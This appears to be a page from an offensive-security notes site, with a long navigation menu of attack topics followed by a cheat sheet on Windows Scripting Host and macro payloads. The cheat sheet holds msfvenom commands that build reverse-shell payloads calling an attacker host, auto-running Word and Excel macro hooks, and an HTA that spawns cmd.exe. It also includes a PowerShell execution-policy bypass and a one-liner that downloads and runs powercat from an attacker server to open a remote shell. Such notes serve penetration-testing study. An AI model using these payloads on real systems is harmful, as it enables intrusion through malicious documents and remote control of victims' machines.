Crypto

Openssl

Enumeration

Containers

Docs

Snmp

Network_scanners

Windows

Exfiltration

Dns

Linux

Windows

Exploit

CPUs

meltdown

Binaries

aslr

Buffer_overflow

Docs

ropping

Canary_bypass

canary_bypass

Format_string

format_string

Integral_promotion

integral_promotion

Dns

zone_transfer

Hashes

collision

Imagemagick

imagetragick

Java

OGNL

cve_2022_26134

Level3_hypervisor

Docker_sec

docker

Linux

capabilities

Dirty_pipe

dirty_pipe

Pkexec

CVE_2021_4034

Sudo

wildard_exploitation

MacOS

Network

mac_spoofing

Padding

padbuster

Python

Samba

smbmap

Sqli

Ssl_tls

heartbleed

Web

Bypass_rate_limiting

bypass_rate_limiting

command_injection

Content_security_policy

content_security_policy

cookie_tampering
csrf

Forced_browsing

forced_browsing

http_header_injection

Idor

idor

Javascript

Jwt

local_file_inclusion
methodology

Nodejs

deserialization

Php

re_registration
remote_file_inclusion

Ssrf

Ssti

ssti

Xxe

Windows

Dll_hijacking

dll_hijacking

Docs

Macros

macros

Payloads

windows_scripting_host

Print_nightmare

CVE-2021-1675

Nightmare-dll

print_nightmare

Process_injection

Service_escalation

service_escalation

Zero_logon

zero_logon

Yaml

deserialization

Forensics

Hashes

Bruteforce

Password_cracking

Password_guessing

standard_passwords

Misc

Active_directory

Printer_hacking

preta

Telecommunications

_sipvicious

.github

ISSUE_TEMPLATE

Sipvicious

sip_vicious

Threat_intelligence

Wifi

airmon-ng

Osint

recon_ng

Social_engineering

spiderfoot
theharvester

Persistence

Post exploitation

Seatbelt

.github

ISSUE_TEMPLATE

CHANGELOG

Seatbelt

Commands

Windows

EventLogs

Output

Bc_security

Docs

Windows

pivoting

Priv_esc

Docs

linux_priv_esc
pspy

Windows

Kernel-exploits

Privesc-scripts

Docs

get_script_onto_target

Suid

Reverse engineering

Android

misc

Docs

Java

krakatau

Reverse shells

Docs

firewalls

Windows

Stego

Docs

Windows Scripting Host (WSH)

Windows Scripting Host (WSH)

Visual Basic Script (VB Script)

cscript file.exe, command line scripts
wscript file.exe, UI scripts
Example (watch out for the whitespace after path, it has to be included)

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True

c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt

Visual Basic for Application (VBA)

Access Windows API via Macros
Open Word, view --> macros, give a name and select document in Macros in
Create reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba

Insert into the following Macro Content, Workbook_Open() for excel, Document_Open() for Word macros

Sub Document_Open()
  SHELL
End Sub

Sub AutoOpen()
  SHELL
End Sub

Sub SHELL()
    <reverse shell goes here>   
End Sub

HTML Application (HTA)

HTML file including some kind of scripting language like JS, VB, ActiveX
mshta is used to excecute

POC

Download file via attacker's web server
File should look like

<html>
  <body>
    <script>
        var shell= 'cmd.exe'
        new ActiveXObject('WScript.Shell').Run(shell);
    </script>
 </body>
</html>

Save Document in a macros supporting file format like Word 97-2003 Template and Word 97-2003 Document

Reverse Shell

Craft reverse shell via msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta

msfconsole via

use exploit/windows/misc/hta_server

Powershell

Powershell execution policy can be checked via

Get-ExecutionPolicy

Set policy via

Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Bypass via

powershell -ex bypass -File shell.ps1

Load powercat on attacker machine and load it on the target via

C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"

Or use msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1